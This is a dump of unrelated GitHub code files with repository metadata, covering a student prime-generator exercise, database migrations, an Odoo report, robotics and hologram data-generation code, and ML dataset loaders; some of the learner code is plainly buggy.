next\r\n'''\r\n'''\r\nGerador de Números Primos\r\nO objetivo deste exercício é criar uma generator function que gere números primos infinitamente. \r\nA generator function irá gerar os números primos um a um, e você pode utilizá-la para\r\nimprimir os primeiros N números primos ou para qualquer outra finalidade que desejar.\r\nLembre-se de que um número primo é um número inteiro maior que 1 e que possui apenas dois divisores:\r\n1 e ele mesmo.\r\n'''\r\n\r\ndef generator(n=1, max=10):\r\n primos = set()\r\n while True:\r\n yield n\r\n n += 1\r\n if not n % 4 == 0:\r\n primos.add(n)\r\n if len(primos) >= max:\r\n print(primos)\r\n\r\n\r\n\r\nn_primos = generator()\r\nfor i in n_primos:\r\n print(i)","repo_name":"rafalimma/learningpython","sub_path":"generator-treino.py","file_name":"generator-treino.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31651270274","text":"\"\"\"empty message\n\nRevision ID: 4bcca7b679ed\nRevises: \nCreate Date: 2020-09-07 14:51:04.922329\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4bcca7b679ed'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('shows')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('shows',\n sa.Column('actors_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('movies_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.ForeignKeyConstraint(['actors_id'], ['actors.id'], name='shows_actors_id_fkey'),\n sa.ForeignKeyConstraint(['movies_id'], ['movies.id'], name='shows_movies_id_fkey')\n )\n # ### end Alembic commands ###\n","repo_name":"mesh3l-966/capstone","sub_path":"migrations/versions/4bcca7b679ed_.py","file_name":"4bcca7b679ed_.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11013703169","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.tools.misc import format_date, DEFAULT_SERVER_DATE_FORMAT\nfrom datetime import timedelta\n\n\nclass AccountGeneralLedgerReport(models.AbstractModel):\n _inherit = \"account.general.ledger\"\n\n # replaced \"Communication\" column with \"Label\"\n @api.model\n def _get_columns_name(self, options):\n return [\n {'name': ''},\n {'name': _('Date'), 'class': 'date'},\n {'name': _('Label')},\n {'name': _('Partner')},\n {'name': _('Currency'), 'class': 'number'},\n {'name': _('Debit'), 'class': 'number'},\n {'name': _('Credit'), 'class': 'number'},\n {'name': _('Balance'), 'class': 'number'}\n ]\n\n # considered only the lable info (aml['name'])\n @api.model\n def _get_aml_line(self, options, account, aml, cumulated_balance):\n if aml['payment_id']:\n caret_type = 'account.payment'\n elif aml['move_type'] in ('in_refund', 'in_invoice', 'in_receipt'):\n caret_type = 'account.invoice.in'\n elif aml['move_type'] in ('out_refund', 'out_invoice', 'out_receipt'):\n caret_type = 'account.invoice.out'\n else:\n caret_type = 'account.move'\n\n # took only label (aml['name']) for title\n if aml['name']:\n title = aml['name']\n else:\n title = '' \n\n if aml['currency_id']:\n currency = self.env['res.currency'].browse(aml['currency_id'])\n else:\n currency = False\n\n return {\n 'id': aml['id'],\n 'caret_options': caret_type,\n 'class': 'top-vertical-align',\n 'parent_id': 'account_%d' % aml['account_id'],\n 'name': aml['move_name'],\n 'columns': [\n {'name': format_date(self.env, aml['date']), 'class': 'date'},\n # {'name': self._format_aml_name(aml['name'], aml['ref'], aml['move_name']), 'title': title, 'class': 'whitespace_print'},\n {'name': self._format_aml_name(aml['name'], '/', '/'), 'title': title, 'class': 'whitespace_print'},\n {'name': aml['partner_name'], 'title': aml['partner_name'], 'class': 'whitespace_print'},\n {'name': currency and aml['amount_currency'] and self.format_value(aml['amount_currency'], currency=currency, blank_if_zero=True) or '', 'class': 'number'},\n {'name': self.format_value(aml['debit'], blank_if_zero=True), 'class': 'number'},\n {'name': self.format_value(aml['credit'], blank_if_zero=True), 'class': 'number'},\n {'name': self.format_value(cumulated_balance), 'class': 'number'},\n ],\n 'level': 4,\n }\n","repo_name":"mmdg2019/ppg","sub_path":"account_ext/models/account_general_ledger.py","file_name":"account_general_ledger.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42109863938","text":"from cgbind.calculations import _cgbind_mol_to_autode\nfrom cgbind.molecule import BaseStruct, Molecule\nimport numpy as np\n\n\ndef check_equivalence_ade_and_cgbind_mol(ade_mol, cgb_mol):\n assert cgb_mol.charge == ade_mol.charge\n assert cgb_mol.mult == ade_mol.mult\n if cgb_mol.solvent is not None:\n assert cgb_mol.solvent == str(ade_mol.solvent)\n else:\n assert ade_mol.solvent is None\n assert cgb_mol.name == ade_mol.name\n assert cgb_mol.n_atoms == ade_mol.n_atoms\n\n coords1 = np.array(ade_mol.coordinates)\n coords2 = np.array(cgb_mol.get_coords())\n\n assert np.isclose(coords1, coords2).all()\n\n\ndef test_cgbind_to_ade_mol_conversion():\n mol = Molecule(smiles='CC[O-]', name='test', charge=-1,\n mult=1, solvent='water')\n\n ade_mol = _cgbind_mol_to_autode(mol)\n check_equivalence_ade_and_cgbind_mol(ade_mol, mol)\n\n\ndef test_cgbind_to_ade_conformer_conversion():\n # only works with SMILES as of now (2 Feb 2023)\n mol = Molecule(smiles='CCCCCO', name='test', n_confs=5)\n\n # n_confs is not the true number!!\n ade_mol = _cgbind_mol_to_autode(mol)\n assert ade_mol.n_conformers == len(mol.conformers) - 1\n\n for idx in range(ade_mol.n_conformers):\n cgb_conf = mol.conformers[idx+1]\n ade_conf = ade_mol.conformers[idx]\n check_equivalence_ade_and_cgbind_mol(ade_conf, cgb_conf)\n","repo_name":"duartegroup/cgbind","sub_path":"tests/test_calculations.py","file_name":"test_calculations.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"33640224087","text":"from pyrep.robots.end_effectors.baxter_suction_cup import BaxterSuctionCup\nfrom pyrep.objects.dummy import Dummy\nfrom pyrep.objects.object import Object\n\n\nclass SteroidBaxterSuctionCup(BaxterSuctionCup):\n\n def __init__(self, count: int = 0):\n super().__init__(count=count)\n\n suction_sensor_root = Dummy('BaxterSuctionCup_sensor_root')\n\n sensors = suction_sensor_root.get_objects_in_tree()\n\n self.sensors = [obj for obj in sensors if 'sensor' in obj.get_name().lower()]\n\n\n def grasp(self, obj: Object) -> bool:\n \"\"\"Attach the object to the suction cup if it is detected.\n\n EDIT: attach only if all sensors detect the object\n\n Note: The does not move the object up to the suction cup. Therefore, the\n proximity sensor should have a short range in order for the suction\n grasp to look realistic.\n\n :param obj: The object to grasp if detected.\n :return: True if the object was detected/grasped.\n \"\"\"\n # detected = self._proximity_sensor.is_detected(obj)\n detected = True\n for sensor in self.sensors:\n if not sensor.is_detected(obj):\n detected = False\n break\n\n # Check if detected and that we are not already grasping it.\n if detected and obj not in self._grasped_objects:\n self._grasped_objects.append(obj)\n self._old_parents.append(obj.get_parent()) # type: ignore\n obj.set_parent(self._attach_point, keep_in_place=True)\n obj.set_model_dynamic(False)\n return detected","repo_name":"hgiangcao/CODs","sub_path":"ITRIP/SteroidSuctionCup.py","file_name":"SteroidSuctionCup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"7571498648","text":"import csv\ndef Reader(fileName):\n file=open(fileName)\n dicr=csv.DictReader(file)\n for row in dicr:\n size=[]\n size.append(row['sq__ft'])\n price=[]\n price.append(row['price'])\n return price,size \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"rtl019/MLpractice","sub_path":"regression_analysis/CSV_Reader.py","file_name":"CSV_Reader.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13710487528","text":"import os\nimport numpy as np\nfrom PIL import Image, ImageDraw\nimport random\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport math\nimport yaml\nfrom pathlib import Path\nfrom utils import line_plane_intersection, show_batch_from_filename\nnp.seterr(all = \"raise\")\nimport matplotlib.pyplot as plt\n\n\n\nclass CGHDataProvider:\n def __init__(self, model_name):\n self.path = Path(os.getcwd())\n self.training_data_path = self.path / \"DataProvider\" / \"training_data\"\n self.validation_data_path = self.path / \"DataProvider\" / \"validation_data\"\n self.n_images_per_file = 512\n self.writer_options = tf.io.TFRecordOptions(compression_type='GZIP')\n self._load_config_file(model_name)\n\n self._generate_training_data()\n self._generate_test_data()\n\n def _load_config_file(self, model_name):\n with open(self.path / \"pretrained_model_configs.yaml\") as config_file:\n config = yaml.safe_load(config_file)\n assert config[model_name] is not None, \"No model with the given name present in config file.\"\n model_config = config[model_name]\n\n # Network specific\n self.model_name = model_name\n self.input_shape = model_config[\"network\"][\"shape\"]\n self.nT = model_config[\"network\"][\"num_training_images\"]\n self.nV = model_config[\"network\"][\"num_val_images\"]\n self.dataset_types = model_config[\"network\"][\"training_types\"]\n\n # SLM Specific\n self.lp = model_config[\"slm\"][\"pixel_pitch\"]\n self.Mx, self.My, self.nz = self.input_shape\n self.l0x = self.Mx * self.lp\n self.l0y = self.My * self.lp\n\n # Optical system Specific\n self.wl = model_config[\"system\"][\"wl\"]\n self.dz = model_config[\"system\"][\"dz\"]\n\n self.test_data_path = (self.path / \"dataprovider\" / \"test_data\" / model_config[\"test_data_folder\"] / model_config[\"test_data_file\"]).with_suffix(\n '.tfrecords')\n\n # TRAINING, VALIDATION AND TEST DATA\n\n def _create_line(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_lines = random.randint(5, 10)\n for n_line in range(num_lines):\n start_x = random.randint(10, image_shape[0] - 10)\n start_y = random.randint(10, image_shape[1] - 10)\n stop_x = random.randint(10, image_shape[0] - 10)\n stop_y = random.randint(10, image_shape[1] - 10)\n draw_im.line((start_x, start_y, stop_x, stop_y),\n fill=1,\n width=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n\n return image\n\n def _create_circle(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_circles = random.randint(5, 10)\n for n_circle in range(num_circles):\n diameter = random.randint(3, int(min(image_shape[0], image_shape[1]) - 2))\n x_0 = random.randint(10, image_shape[0] - 10)\n y_0 = random.randint(10, image_shape[1] - 10)\n x_1 = x_0 + diameter\n y_1 = y_0 + diameter\n draw_im.ellipse([(x_0, y_0), (x_1, y_1)],\n outline=1,\n fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n return image\n\n def _create_sphere(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n if image_shape[-1] == 1:\n return self._create_circle(image_shape)\n image = np.zeros(image_shape)\n min_R = 1.1 * self.dz\n max_R = min(self.l0x, self.l0y) // 6\n n_spheres = random.randint(2, 8)\n center = image_shape[2] // 2\n nnz = 64\n zs = [(zn - center) * self.dz for zn in range(image_shape[2])]\n z_samples_axis = np.linspace(zs[0] - self.dz, zs[-1] + self.dz, nnz)\n while image.max() == 0:\n for sphere in range(n_spheres):\n centerx = random.choice(range(image_shape[0]))\n centery = random.choice(range(image_shape[1]))\n centerz = random.choice(z_samples_axis)\n sphere_radius = np.random.uniform(min_R, max_R)\n for z in range(image_shape[2]):\n im = Image.fromarray(image[:, :, z])\n draw_im = ImageDraw.Draw(im)\n delta_z = np.abs(centerz - zs[z])\n if sphere_radius > delta_z:\n cross_section_radius = np.sqrt(sphere_radius ** 2 - delta_z ** 2) // self.lp\n draw_im.ellipse([(centerx - cross_section_radius, centery - cross_section_radius),\n (centerx + cross_section_radius, centery + cross_section_radius)],\n fill=1)\n image[:, :, z] = np.array(im, dtype='float32')\n if z != 0 and image[:, :, 0].max() != 0 and image[:, :, z].max() != 0:\n image[:, :, z] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, z] ** 2))\n\n image -= image.min()\n image /= image.max()\n return image\n\n def _create_cylinder(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n plane_vector = [0, 0, 1]\n num_cyls = random.randint(3, 8)\n max_R = min(image_shape[0], image_shape[1]) / 2\n center = image_shape[2] // 2\n zs = [(zn - center) * self.dz for zn in range(image_shape[2])]\n startz = zs[0]\n endz = zs[-1]\n while image.max() == 0:\n for cyl in range(num_cyls):\n startx = random.choice(range(image_shape[0]))\n starty = random.choice(range(image_shape[1]))\n\n endx = random.choice(range(image_shape[0]))\n endy = random.choice(range(image_shape[1]))\n\n line_vector = [endx - startx, endy - starty, endz - startz]\n norm_line_v = line_vector / np.linalg.norm(line_vector)\n line_point = [startx, starty, startz]\n radius = random.uniform(0.1, 1) * max_R\n radii = radius * norm_line_v\n for plane in range(image_shape[2]):\n plane_point = [startx, starty, zs[plane]]\n I = line_plane_intersection(line_vector, line_point, plane_vector, plane_point)\n if I is not None:\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n x_1 = I[0] + radii[0]\n y_1 = I[1] + radii[1]\n draw_im.ellipse([(I[0] - radii[0], I[1] - radii[1]), (x_1, y_1)], fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n try:\n image /= image.max()\n except FloatingPointError:\n print(\"cylinder\")\n print(image)\n return image\n\n def _create_polygon(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_polys = random.randint(5, 10)\n for n_poly in range(num_polys):\n radius = random.randint(5, int(image_shape[0] - 2))\n x_0 = random.randint(10, image_shape[0] - 10)\n y_0 = random.randint(10, image_shape[1] - 10)\n n_sides = random.randint(3, 6)\n xs = [random.randint(x_0, x_0 + radius) for n in range(n_sides)]\n ys = [random.randint(y_0, y_0 + radius) for n in range(n_sides)]\n xy = [val for pair in zip(xs, ys) for val in pair]\n draw_im.polygon(xy, outline=1, fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n\n return image\n\n def _generate_training_data(self):\n\n # Check whether training dataset exists already\n dir_name = \"TRAIN-Mx{}-My{}-nz{}-nT{}\".format(self.Mx,\n self.My,\n self.nz,\n self.nT)\n if os.path.isdir(os.path.join(self.training_data_path, dir_name)):\n print(\"Chosen training data already exists. Continuing...\")\n else:\n os.mkdir(self.training_data_path / dir_name)\n n_files = self.nT // self.n_images_per_file\n if n_files == 0:\n n_files = 1\n n_images = self.nT\n else:\n n_images = self.n_images_per_file\n\n for file_index in range(n_files):\n file_name = \"file_{}.tfrecords\".format(file_index)\n with tf.io.TFRecordWriter(str(self.training_data_path / dir_name / file_name), options=self.writer_options) as writer:\n progress = tqdm(range(n_images))\n progress.set_description(\"Writing training file {} of {} to tfrecords ...\".format(file_index+1, n_files))\n for i in progress:\n rand_select = random.choice(self.dataset_types)\n if rand_select == 'line':\n training_image = self._create_line()\n elif rand_select == 'circle':\n training_image = self._create_circle()\n elif rand_select == 'sphere':\n training_image = self._create_sphere()\n elif rand_select == 'cylinder':\n training_image = self._create_cylinder()\n else:\n training_image = self._create_polygon()\n\n image_bytes = training_image.tostring()\n\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n\n feature = {'image': f}\n\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n\n writer.write(example_to_string)\n self.train_file_path = str(self.training_data_path / dir_name)\n\n self._generate_validation_data()\n\n\n def _generate_validation_data(self):\n # Check whether validation dataset exists already\n dir_name = \"VAL-Mx{}-My{}-nz{}-nV{}\".format(self.Mx,\n self.My,\n self.nz,\n self.nV,)\n if os.path.isdir(os.path.join(self.validation_data_path, dir_name)):\n print(\"Chosen validation data already exists. Continuing...\")\n else:\n os.mkdir(self.validation_data_path / dir_name)\n n_files = self.nV // self.n_images_per_file\n if n_files == 0:\n n_files = 1\n n_images = self.nV\n else:\n n_images = self.n_images_per_file\n\n for file_index in range(n_files):\n file_name = \"file_{}.tfrecords\".format(file_index)\n with tf.io.TFRecordWriter(str(self.validation_data_path / dir_name / file_name), options=self.writer_options) as writer:\n progress = tqdm(range(n_images))\n progress.set_description(\"Writing validation file {} of {} to tfrecords ...\".format(file_index + 1, n_files))\n for i in progress:\n rand_select = random.choice(self.dataset_types)\n if rand_select == 'line':\n val_image = self._create_line()\n elif rand_select == 'circle':\n val_image = self._create_circle()\n elif rand_select == 'sphere':\n val_image = self._create_sphere()\n elif rand_select == 'cylinder':\n val_image = self._create_cylinder()\n else:\n val_image = self._create_polygon()\n\n image_bytes = val_image.tostring()\n\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n\n feature = {'image': f}\n\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n\n writer.write(example_to_string)\n self.val_file_path = str(self.validation_data_path / dir_name)\n\n def _generate_test_data(self):\n # Test data consists of a batch of 32 multiplane images, one batch for each num. of planes.\n # Images are a mix of 2D and 3D objects, and portraits.\n\n sizes = [(256, 256), (512, 512), (1024, 1024), (1920, 1080)]\n planes = [1, 3, 5, 7, 11]\n orig_faces_path = self.path / \"test_batch_orig_faces\"\n progress = tqdm(enumerate(sizes))\n progress.set_description(f\"Writing test data\")\n for sizeIndex, size in progress:\n for nPlanes in planes:\n plane_folder = self.path / \"dataprovider\" / \"test_data\" / f\"size_{size[0]}x{size[1]}\"\n if not os.path.isdir(plane_folder):\n os.mkdir(plane_folder)\n filename = plane_folder / f\"TESTBATCH_z_{nPlanes}.tfrecords\"\n shape = (size[1], size[0], nPlanes)\n if not os.path.isfile(filename):\n nPortraitImages = 8\n n2DImages = 8\n n3DImages = 16\n with tf.io.TFRecordWriter(str(filename), options=self.writer_options) as writer:\n portraits = [orig_faces_path / f for f in os.listdir(orig_faces_path) if os.path.isfile(orig_faces_path / f) and f\"{size[0]}x{size[1]}\" in f]\n for i in range(nPortraitImages):\n stackedPortrait = np.zeros(shape)\n selectedPortraits = random.choices(portraits, k=nPlanes)\n for index, portrait in enumerate(selectedPortraits):\n portraitImage = np.array(plt.imread(portrait), dtype='float32')\n portraitImage = np.expand_dims(portraitImage[:, :, 0], axis=[0])\n portraitImage -= portraitImage.min()\n portraitImage /= portraitImage.max()\n stackedPortrait[:, :, index] = portraitImage\n stackedPortraitString = stackedPortrait.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[stackedPortraitString]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n for i in range(n2DImages):\n rand_select = random.choice(['line', 'circle', 'polygon'])\n if rand_select == 'line':\n image2D = self._create_line(shape)\n elif rand_select == 'circle':\n image2D = self._create_circle(shape)\n else:\n image2D = self._create_polygon(shape)\n image_bytes = image2D.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n for i in range(n3DImages):\n rand_select = random.choice(['sphere', 'cylinder'])\n if rand_select == 'sphere':\n image3D = self._create_sphere(shape)\n elif rand_select == 'cylinder':\n image3D = self._create_cylinder(shape)\n image_bytes = image3D.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n\n\n\n # FOURIER OPTICS SPECIFIC FUNCTIONS\n def _calculate_phase_factors(self):\n x, y = np.meshgrid(np.linspace(-self.My // 2 + 1, self.My // 2, self.My),\n np.linspace(-self.Mx // 2 + 1, self.Mx // 2, self.Mx))\n Fx = x / self.lp / self.Mx\n Fy = y / self.lp / self.My\n\n center = self.nz // 2\n phase_factors = []\n\n for n in range(self.nz):\n zn = n - center\n p = np.exp(-1j * math.pi * self.wl * (zn * self.dz) * (Fx ** 2 + Fy ** 2))\n phase_factors.append(p.astype(np.complex64))\n self.phase_factors = phase_factors\n\n # TODO: Get training data https://keras.io/examples/keras_recipes/tfrecord/\n def get_training_data(self):\n return self.train_file_path, self.val_file_path\n","repo_name":"Andreasgejlm/SingleCGHModel","sub_path":"DataProvider/CGHDataProvider.py","file_name":"CGHDataProvider.py","file_ext":"py","file_size_in_byte":19898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73651782884","text":"import pandas as pd\nimport urllib\nimport sys\n\n\ndef get_schedules(url_link):\n\n schedules = []\n\n for i in range(len(pd.read_html(url_link, flavor=\"lxml\"))):\n try:\n df = pd.read_html(url_link, flavor=\"lxml\")[i]\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n schedules.append(df.to_dict('records'))\n except urllib.error.URLError:\n print('\\nGiven values are not correct. Rerun the script.\\n')\n sys.exit(2)\n\n return schedules\n\n\ndef get_rooms(room):\n df = pd.read_html(\n 'http://www.cs.ubbcluj.ro/files/orar/2018-2/sali/legenda.html', flavor=\"lxml\")[0]\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n rooms = df.to_dict('records')\n for r in rooms:\n if r['Sala'] == room:\n return f'{r[\"Sala\"]} - {(r[\"Localizarea\"])}'\n","repo_name":"andreicorpo/ubb_IG_python_schedule_script","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13676103854","text":"\"\"\"ACDC dataset\"\"\"\nimport os\nimport torch\nimport numpy as np\nimport logging\nimport glob\n\nfrom PIL import Image\nfrom .seg_data_base import SegmentationDataset\nimport random\n\n\nclass ACDCSegmentation(SegmentationDataset):\n BASE_DIR = 'acdc'\n NUM_CLASS = 19\n\n def __init__(self, root='datasets/acdc', split='train', mode=None, transform=None, **kwargs):\n super(ACDCSegmentation, self).__init__(root, split, mode, transform, **kwargs)\n assert os.path.exists(self.root), \"Please put dataset in {SEG_ROOT}/datasets/acdc\"\n self.images, self.mask_paths = _get_acdc_pairs(self.root, self.split)\n assert (len(self.images) == len(self.mask_paths))\n if len(self.images) == 0:\n raise RuntimeError(\"Found 0 images in subfolders of:\" + root + \"\\n\")\n self.valid_classes = [7, 8, 11, 12, 13, 17, 19, 20, 21, 22,\n 23, 24, 25, 26, 27, 28, 31, 32, 33]\n self._key = np.array([-1, -1, -1, -1, -1, -1,\n -1, -1, 0, 1, -1, -1,\n 2, 3, 4, -1, -1, -1,\n 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15,\n -1, -1, 16, 17, 18])\n self._mapping = np.array(range(-1, len(self._key) - 1)).astype('int32')\n\n def _class_to_index(self, mask):\n values = np.unique(mask)\n for value in values:\n assert (value in self._mapping)\n index = np.digitize(mask.ravel(), self._mapping, right=True)\n return self._key[index].reshape(mask.shape)\n def _val_sync_transform_resize(self, img, mask):\n w, h = img.size\n x1 = random.randint(0, w - self.crop_size[1])\n y1 = random.randint(0, h - self.crop_size[0])\n img = img.crop((x1, y1, x1 + self.crop_size[1], y1 + self.crop_size[0]))\n mask = mask.crop((x1, y1, x1 + self.crop_size[1], y1 + self.crop_size[0]))\n\n img, mask = self._img_transform(img), self._mask_transform(mask)\n return img, mask\n\n def __getitem__(self, index):\n img = Image.open(self.images[index]).convert('RGB')\n if self.mode == 'test':\n if self.transform is not None:\n img = self.transform(img)\n return img, os.path.basename(self.images[index])\n mask = Image.open(self.mask_paths[index])\n if self.mode == 'train':\n img, mask = self._sync_transform(img, mask, resize=True)\n elif self.mode == 'val':\n img, mask = self._val_sync_transform_resize(img, mask)\n else:\n assert self.mode == 'testval'\n img, mask = self._val_sync_transform_resize(img, mask)\n if self.transform is not None:\n img = self.transform(img)\n return img, mask, os.path.basename(self.images[index])\n\n def _mask_transform(self, mask):\n target = self._class_to_index(np.array(mask).astype('int32'))\n return torch.LongTensor(np.array(target).astype('int32'))\n\n def __len__(self):\n return len(self.images)\n\n @property\n def pred_offset(self):\n return 0\n\n @property\n def classes(self):\n \"\"\"Category names.\"\"\"\n return ('road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light',\n 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car',\n 'truck', 'bus', 'train', 'motorcycle', 'bicycle')\n\n\ndef _get_acdc_pairs(folder, split='train'):\n img_paths = []\n mask_paths = []\n if split == 'test':\n split = 'val'\n img_paths_temp = glob.glob(os.path.join(folder, 'rgb_anon/*/{}/*/*_rgb_anon.png'.format(split)))\n for imgpath in img_paths_temp:\n maskpath = imgpath.replace('/rgb_anon/', '/gt/').replace('rgb_anon.png', 'gt_labelIds.png')\n if os.path.isfile(imgpath) and os.path.isfile(maskpath):\n img_paths.append(imgpath)\n mask_paths.append(maskpath)\n else:\n logging.info('cannot find the mask or image:', imgpath, maskpath)\n logging.info('Found {} images in the folder {}'.format(len(img_paths), folder))\n return img_paths, mask_paths\n\n\nif __name__ == '__main__':\n dataset = ACDCSegmentation()\n","repo_name":"jamycheung/Trans4Trans","sub_path":"segmentron/data/dataloader/acdc.py","file_name":"acdc.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"24918501555","text":"\"\"\"\nLightGBM\n-----------------\n\"\"\"\n\nfrom typing import Any\nfrom functools import partial\n\nfrom darts import models\nimport numpy as np\nimport numpy.typing as npt\nimport optuna\n\nfrom oats.models._darts_simple import SimpleDartsModel\n\n\nclass LightGBMModel(SimpleDartsModel):\n \"\"\"LightGBM Model\n\n Using regression via gradient boosted trees as a predictor. Anomalies scores are deviations from predictions.\n\n Reference: https://unit8co.github.io/darts/generated_api/darts.models.forecasting.gradient_boosted_model.html\n \"\"\"\n\n def __init__(\n self,\n window: int = 10,\n n_steps: int = 1,\n lags: int = 1,\n val_split: float = 0.0,\n **kwargs\n ):\n \"\"\"\n initialization also accepts any parameters used by: https://unit8co.github.io/darts/generated_api/darts.models.forecasting.gradient_boosted_model.html\n\n Args:\n window (int, optional): rolling window size to feed into the predictor. Defaults to 10.\n n_steps (int, optional): number of steps to predict forward. Defaults to 1.\n lags (int, optional): number of lags. Defaults to 1.\n val_split (float, optional): proportion of data points reserved for validation; only used if using auto-tuning (not tested). Defaults to 0.\n \"\"\"\n\n model_cls = models.LightGBMModel\n\n super().__init__(model_cls, window, n_steps, lags, val_split, **kwargs)\n\n def _model_objective(self, trial, train_data: npt.NDArray[Any]):\n params = {\n \"lambda_l1\": trial.suggest_loguniform(\"lambda_l1\", 1e-8, 10.0),\n \"lambda_l2\": trial.suggest_loguniform(\"lambda_l2\", 1e-8, 10.0),\n \"num_leaves\": trial.suggest_int(\"num_leaves\", 2, 256),\n \"feature_fraction\": trial.suggest_uniform(\"feature_fraction\", 0.4, 1.0),\n \"bagging_fraction\": trial.suggest_uniform(\"bagging_fraction\", 0.4, 1.0),\n \"bagging_freq\": trial.suggest_int(\"bagging_freq\", 1, 7),\n \"min_child_samples\": trial.suggest_int(\"min_child_samples\", 5, 100),\n }\n\n return self._get_hyperopt_res(params, train_data)\n","repo_name":"georgian-io/pyoats","sub_path":"oats/models/predictive/lightgbm.py","file_name":"lightgbm.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"52"} +{"seq_id":"8620786860","text":"l=int(input())\nwhile l>0:\n\tprev=\"+x\";\n\tnext=\"\";\n\tcurr = raw_input().split()\n\ti=0\n\twhile i\"\n return disk_str\n\n\ndef str_to_int(string):\n s = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n lookup = {alphabet[i]: i for i in range(len(alphabet))}\n for letter in string:\n try:\n s += lookup[letter]\n except KeyError:\n pass\n return 